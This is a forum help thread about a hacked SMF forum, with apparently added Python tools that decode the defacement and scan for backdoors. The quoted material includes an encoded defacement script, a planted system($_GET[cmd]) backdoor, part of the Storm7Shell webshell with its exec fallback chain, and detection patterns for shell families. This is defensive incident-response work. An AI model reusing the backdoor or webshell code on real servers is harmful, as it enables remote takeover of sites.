hack injection index.html

Started by Am', May 10, 2010, 05:13:04 PM

Am'

Hello,

My forum has just been hacked twice today; my FTP contains only SMF (2 RC3).

The hackers managed to inject an index.html page into the FTP root and also into the SMF root:



Another piece of code:

<Script Language='Javascript'>
<!-- -->
<!--
document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%0A%76%61%72%20%6C%65%66%74%3D%22%5B%22%3B%0A%76%61%72%20%72%69%67%68%74%3D%22%5D%22%3B%0A%76%61%72%20%6D%73%67%3D%22%20%20%21%20%2D%20%3A%3A%20%48%61%63%6B%65%64%20%42%79%20%53%61%46%31%20%3A%3A%20%2D%20%21%20%2D%20%3A%3A%20%53%61%46%31%20%4F%77%6E%7A%20%59%6F%75%72%20%53%65%63%75%72%69%74%79%20%3A%3A%20%2D%22%3B%0A%76%61%72%20%73%70%65%65%64%3D%32%30%30%3B%0A%0A%66%75%6E%63%74%69%6F%6E%20%73%63%72%6F%6C%6C%5F%74%69%74%6C%65%28%29%20%7B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%74%69%74%6C%65%3D%6C%65%66%74%2B%6D%73%67%2B%72%69%67%68%74%3B%0A%20%20%20%20%20%20%20%20%6D%73%67%3D%6D%73%67%2E%73%75%62%73%74%72%69%6E%67%28%31%2C%6D%73%67%2E%6C%65%6E%67%74%68%29%2B%6D%73%67%2E%63%68%61%72%41%74%28%30%29%3B%0A%20%20%20%20%20%20%20%20%73%65%74%54%69%6D%65%6F%75%74%28%22%73%63%72%6F%6C%6C%5F%74%69%74%6C%65%28%29%22%2C%73%70%65%65%64%29%3B%0A%7D%0A%73%63%72%6F%6C%6C%5F%74%69%74%6C%65%28%29%3B%0A%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%20%62%67%63%6F%6C%6F%72%3D%23%30%30%30%30%30%30%3E%0A%3C%63%65%6E%74%65%72%3E%0A%3C%69%6D%67%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%65%62%2E%69%6D%67%2E%76%34%2E%73%6B%79%72%6F%63%6B%2E%6E%65%74%2F%65%62%62%2F%6D%69%7A%6F%2D%77%69%6E%30%35%2F%70%69%63%73%2F%32%31%39%37%31%32%38%32%39%37%5F%36%2E%6A%70%67%27%3E%3C%62%72%3E%0A%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%66%66%30%30%30%30%22%3E%44%69%6D%61%44%69%6D%61%57%79%64%61%64%3C%2F%46%4F%4E%54%3E%0A%3C%64%69%76%20%69%64%3D%22%6D%69%6E%69%50%6C%61%79%65%72%22%3E%3C%65%6D%62%65%64%20%74%79%70%65%3D%22%61%70%70%6C%69%63%61%74%69%6F%6E%2F%78%2D%73%68%6F%63%6B%77%61%76%65%2D%66%6C%61%73%68%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%61%72%6F%63%7A%69%6B%2E%63%6F%6D%2F%6C%65%63%74%65%75%72%2E%73%77%66%22%20%73%74%79%6C%65%3D%22%22%20%69%64%3D%22%6D%61%72%6F%63%7A%69%6B%50%6C%61%79%65%72%22%20%6E%61%6D%65%3D%22%6D%61%72%6F%63%7A%69%6B%50%6C%61%79%65%72%22%20%62%67%63%6F%6C%6F%72%3D%22%23%66%66%66%66%22%20%71%75%61%6C%69%74%79%3D%22%68%69%67%68%22%20%77%6D%6F%64%65%3D%22%74%72%61%6E%73%70%61%72%65%6E%74%22%20%66%6C%61%73%68%76%61%72%73%3D%22%63%68%65%6D%69%6E%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%61%72%6F%63%7A%69%6B%2E%63%6F%6D%2F%69%6E%64%65%78%2E%70%68%70%2F%70%6C%61%79%6C%69%73%74%73%2F%61%72%74%69%73%74%5F%70%6C%61%79%6C%69%73%74%2F%39%36%22%20%68%65%69%67%68%74%3D%22%30%22%20%77%69%64%74%68%3D%22%30%22%3E%3C%2F%64%69%76%3E%0A%3C%2F%68%74%6D%6C%3E%0A'));
//-->
</Script>


I contacted my host, who told me that it may simply be an SMF flaw; a script may be stored in the database or in a directory....

What should I do, please? It is really urgent.

In the meantime I have changed the forum's directory and put up a maintenance page in HTML.

Thank you.
If someone feels he has never made a mistake in his life, it means he has never tried anything new in his life.
My Mods For SMF 2 RC3 : XQuote XCode - Vbulletin Style New Meta Tags
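The defacement page in the post above is wrapped in document.write(unescape(...)) so that its contents cannot be read at a glance. The Python below is an added example, not code from the original post: it peels the unescape() wrapper (including nested layers, and the %uXXXX form that JavaScript's unescape() accepts but urllib does not), recovers the markup, and lists the external URLs the page loads, which are the hosts to block and to report. The script it decodes is constructed here by encoding a short stand-in page; the example.invalid hosts are placeholders, not the addresses in the real payload.

```python
"""Decode a document.write(unescape('...')) defacement and pull its IOCs."""
from __future__ import annotations

import re
from urllib.parse import quote, unquote

# The wrapper the defacement uses: unescape('...') with either quote style.
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


def js_unescape(s: str) -> str:
    """Mimic JavaScript's unescape(): %XX escapes plus the legacy %uXXXX form.
    urllib's unquote only understands %XX, so %uXXXX is converted first."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def peel_unescape_layers(script: str, max_layers: int = 5) -> str:
    """Defacers often nest unescape() inside unescape(); decode until none remains."""
    current = script
    for _ in range(max_layers):
        m = UNESCAPE_RE.search(current)
        if not m:
            break
        current = js_unescape(m.group(2))
    return current


def extract_iocs(markup: str) -> list[str]:
    """External resources the page loads: image host, Flash player, playlist."""
    return sorted(set(URL_RE.findall(markup)))


def analyse(script: str) -> dict:
    decoded = peel_unescape_layers(script)
    banner = re.search(r'var\s+msg\s*=\s*"([^"]*)"', decoded)
    return {
        "markup": decoded,
        "urls": extract_iocs(decoded),
        "banner": banner.group(1) if banner else None,
    }


# Constructed sample (not the payload from the thread): a stand-in page encoded
# the same way the attacker's page was, with placeholder hosts.
SAMPLE_MARKUP = (
    "<html>\n<head>\n<script>\n"
    'var msg="  ! - :: Hacked By sample ::";\n'
    "</script>\n</head>\n<body bgcolor=#000000>\n"
    "<img src='http://img.example.invalid/pic.jpg'><br>\n"
    '<embed type="application/x-shockwave-flash" src="http://player.example.invalid/lecteur.swf">\n'
    "</body>\n</html>\n"
)
SAMPLE_SCRIPT = (
    "<Script Language='Javascript'>\n<!--\n"
    "document.write(unescape('" + quote(SAMPLE_MARKUP, safe="") + "'));\n"
    "//-->\n</Script>\n"
)


if __name__ == "__main__":
    result = analyse(SAMPLE_SCRIPT)
    print("banner:", result["banner"])
    for url in result["urls"]:
        print("loads:", url)
```

Against the real script from the post, paste the whole <Script> block into analyse(). JavaScript's escape() leaves @*_+-./ unencoded, and unquote passes those through unchanged, so the decoder does not depend on how much of the page the attacker chose to encode.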

busterone

First, I would change your login password for your hosting control panel, your ftp password and your SMF administrative password. I would also make sure that the computer you use to access your webspace, ftp, and forum is malware free. Check for trojans/keyloggers. 

Are you the only one with administrative access, or does anyone else also have control panel/ftp access ?

Am'

Searching the FTP, I found this:

themes/default/css/index.php:


<?php
system($_GET[cmd]);
?>


and another file, stor.php (546 KB):

<?php
/******************************************************************************************
*  Storm7Shell, a modded Locus7Shell, which is a: $count=0; while($count==0){ echo ' mod of a'; }
*
*  VERSION 2 ******!!!!
*
*  By sToRm - the 15-year-old hacker :)
*
*  Greetz to all my friends in #lobby
*
*  A big, fat "****** you" to:
*   - HellBound Hackers (you're also part of the next on the list, except you can't even deface!)
*   - people who deface because they can't root and think they're 1337
*   - idiots who add mail() to their shells so they can log your ownages
*   - idiots who add mail() to their shells so they can log your ownages and mess up the variables so it doesn't even work!
*   - MPAA, RIAA, and all those other arse-hole anti-p2p organizations
*
*  lack of money and parental freedom leaves me with no site to advertise xD
*
*
*  Newer Mods (added by me) for v2 --
+--------------------------------------------------------+
*  fixed a bug where deleting something from a path that has a space in it would return you to an invalid dir
*  fixed the *nix aliases where the cmds were in the name and the names were executed :S
*  added md5/sha1 file checksums
*  removed fgdump (no need for three programs that do the same f-ing thing :P) !!! 1 mb saved !!!
*
*
*  Old Mods (added by me) for v1 --
+--------------------------------------------------------+
*  added the trojan executer
*  cleaned up the interface in general
*  added windows login hash grabber + sam/fg/pwdump2
*  added mass code injector (thanks SubSyn)
*  added pre-compiled h00ly****** and raptor_chown
*  added log cleaners for both *nix and windows
*  removed all the ******ty/non-working functions in the drop-down boxes
*  fixed the google kernel thing (the search variables were fuxxed up)
*  made the dir listing easier to read with the alternating bgcolors
*  little optimizations in code here and there (i'm an optimization whore tbh)
*  submit md5/sha1 hash to cracking sites
*  made that awesome logo ;)
*  added the disabled php functions thing (took from r57shell)
*  added better windows/*nix-specific aliases
*  cleaned up the safe-mode bypass functions (wow, some of the ******tiest code i've ever seen o_O )
*  wordlist md5/sha1 cracker
*
*  What I Plan to Do Next --
+--------------------------------------------------------+
*  smaller size (somehow) :S
*  more sploits
*  allow input for dir to unpack exploits to
*  better trojans/backdoors
*  more functions/aliases
*  maybe move stuff around/change theme
*  make the php picture in the dir listing white for easier readability
*  take a first look at the sql section o.O
*  remove:
*   - more of those stupid spaces after every line
*   - more " and change them to ' for faster execution
*   - a bunch of other stupid code things (example:  echo("$msg");  (wtf... :S))
*********************************************************/

//milw0rm search
// Reads the kernel release and OS name of the compromised host and builds a
// milw0rm search link for local root exploits matching that version.
$Lversion=php_uname(r);
$OSV=php_uname(s);
if(eregi('Linux',$OSV))
{
$Lversion=substr($Lversion,0,6);
$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
}else{
$Lversion=substr($Lversion,0,3);
$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
}
//End of milw0rm search

//w4ck1ng Shell
// Command-execution helper: tries popen() first, otherwise falls back through
// exec(), backticks, system(), passthru() and popen() to get past disable_functions.
if (!function_exists('myshellexec'))
{
if(is_callable("popen")){
function myshellexec($command) {
if (!($p=popen("($command)2>&1","r"))) {
return 126;
}
while (!feof($p)) {
$line=fgets($p,1000);
$out .= $line;
}
pclose($p);
return $out;
}
}else{
function myshellexec($cmd)
{
 global $disablefunc;
 $result = '';
 if (!empty($cmd))
 {
  if (is_callable('exec') and !in_array('exec',$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_resource($fp = popen($cmd,"r")))
  {
   $result = '';
   while(!feof($fp)) {$result .= fread($fp,1024);}
   pclose($fp);
  }
 }
 return $result;
}
}
}

......


What is it? How did they manage to put it on my FTP?

In the stor file they talk about Linux, mail... what does it mean?

CapadY

Third: SMF doesn't have an index.html page at all. It uses index.php.
Please, don't PM me for support unless invited.
If you don't understand this, you will be blacklisted.

stog

An HTML part is added above the PHP in index.php.
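Putting busterone's, CapadY's and stog's points together with what Am' found on the FTP, the clean-up step a practitioner wants is a scan of the web root for the indicators seen in this thread (a command-execution call fed from $_GET, the webshell family names in stor.php's header, an index.html that SMF never ships, and an index.php that no longer begins with <?php), followed by a hash comparison against a freshly unpacked copy of the same SMF release so that nothing the pattern scan misses survives. The Python below is an added example, not SMF code and not anything posted in the thread; the two sample trees it builds in a temporary directory are constructed stand-ins for a clean and a defaced install, not real SMF files.

```python
"""Scan an SMF web root for the backdoors seen in this thread, then diff it
against a clean copy of the same release."""
from __future__ import annotations

import hashlib
import re
import tempfile
from pathlib import Path

# Indicators: the one-line backdoor and exec helpers from the thread, plus the
# shell family names in stor.php's header. Tune for your own tree.
INDICATORS = [
    (re.compile(r"\b(system|exec|passthru|shell_exec|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b"),
     "command execution from request parameter"),
    (re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13|\$_(GET|POST|REQUEST))\b"),
     "eval of decoded or request-supplied code"),
    (re.compile(r"Storm7Shell|Locus7Shell|r57shell|c99shell|w4ck1ng", re.IGNORECASE),
     "known webshell family name"),
]
PHP_SUFFIXES = {".php", ".phtml", ".php3", ".php4", ".php5"}


def scan_php(text: str, name: str) -> list[str]:
    """Flag backdoor indicators in one PHP file's contents."""
    findings = [label for pattern, label in INDICATORS if pattern.search(text)]
    # stog's observation: index.php must begin with the PHP open tag. SMF puts a
    # small guard index.php in every directory, so this applies at every level.
    if name == "index.php" and not text.lstrip("\ufeff \t\r\n").startswith("<?php"):
        findings.append("content prepended before <?php")
    return findings


def scan_tree(root) -> dict[str, list[str]]:
    """Map each suspicious file (relative path) to its list of findings."""
    root = Path(root)
    report = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.suffix.lower() in PHP_SUFFIXES:
            findings = scan_php(path.read_text(errors="replace"), path.name)
        elif path.name.lower() in ("index.html", "index.htm"):
            findings = ["unexpected index.html (SMF ships none)"]  # CapadY's point
        else:
            findings = []
        if findings:
            report[rel] = findings
    return report


def _hashes(root: Path) -> dict[str, str]:
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def diff_against_clean(clean_root, live_root) -> dict[str, list[str]]:
    """Compare the live tree with a freshly unpacked copy of the same release:
    anything added or modified is either your customisation or the intruder's."""
    clean, live = _hashes(Path(clean_root)), _hashes(Path(live_root))
    return {
        "added": sorted(set(live) - set(clean)),
        "missing": sorted(set(clean) - set(live)),
        "modified": sorted(k for k in clean.keys() & live.keys() if clean[k] != live[k]),
    }


# Constructed sample trees (stand-ins, not real SMF files): a clean copy and the
# defaced live copy with the files Am' described.
STOCK_INDEX = "<?php\n// stock SMF index.php stand-in\necho 'forum';\n"
GUARD_INDEX = "<?php\n// directory guard stand-in\nexit;\n"
_CLEAN = {"index.php": STOCK_INDEX, "Sources/Subs.php": "<?php\n// stock Subs.php stand-in\n",
          "Themes/default/css/index.php": GUARD_INDEX}
_LIVE = dict(_CLEAN)
_LIVE.update({
    "index.php": "<html><body>defaced</body></html>\n" + STOCK_INDEX,
    "Themes/default/css/index.php": "<?php\nsystem($_GET[cmd]);\n?>\n",
    "index.html": "<html><body>defaced</body></html>\n",
    "stor.php": "<?php\n/* Storm7Shell, a modded Locus7Shell */\nfunction myshellexec($c){ $p=popen(\"($c)2>&1\",'r'); }\n",
})


def build_sample_trees() -> tuple[Path, Path]:
    """Write the two sample trees to a temp dir; returns (clean_root, live_root)."""
    base = Path(tempfile.mkdtemp(prefix="smf-ir-"))
    for sub, files in (("clean", _CLEAN), ("live", _LIVE)):
        for rel, content in files.items():
            target = base / sub / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(content)
    return base / "clean", base / "live"


if __name__ == "__main__":
    clean_root, live_root = build_sample_trees()
    for rel, findings in scan_tree(live_root).items():
        print(f"{rel}: {', '.join(findings)}")
    print(diff_against_clean(clean_root, live_root))
```

The comparison is the part to trust: the indicator patterns catch the shells from this thread but not one that is merely obfuscated differently, whereas a file that differs from the clean release is either your own modification or the intruder's. SMF ships a guard index.php in themes/default/css, so the file Am' found there was most likely an overwritten guard rather than an addition, which is exactly the kind of change only the hash comparison reveals. The scan says nothing about the database or about stolen credentials, so busterone's advice to rotate the control panel, FTP and admin passwords from a clean machine still applies.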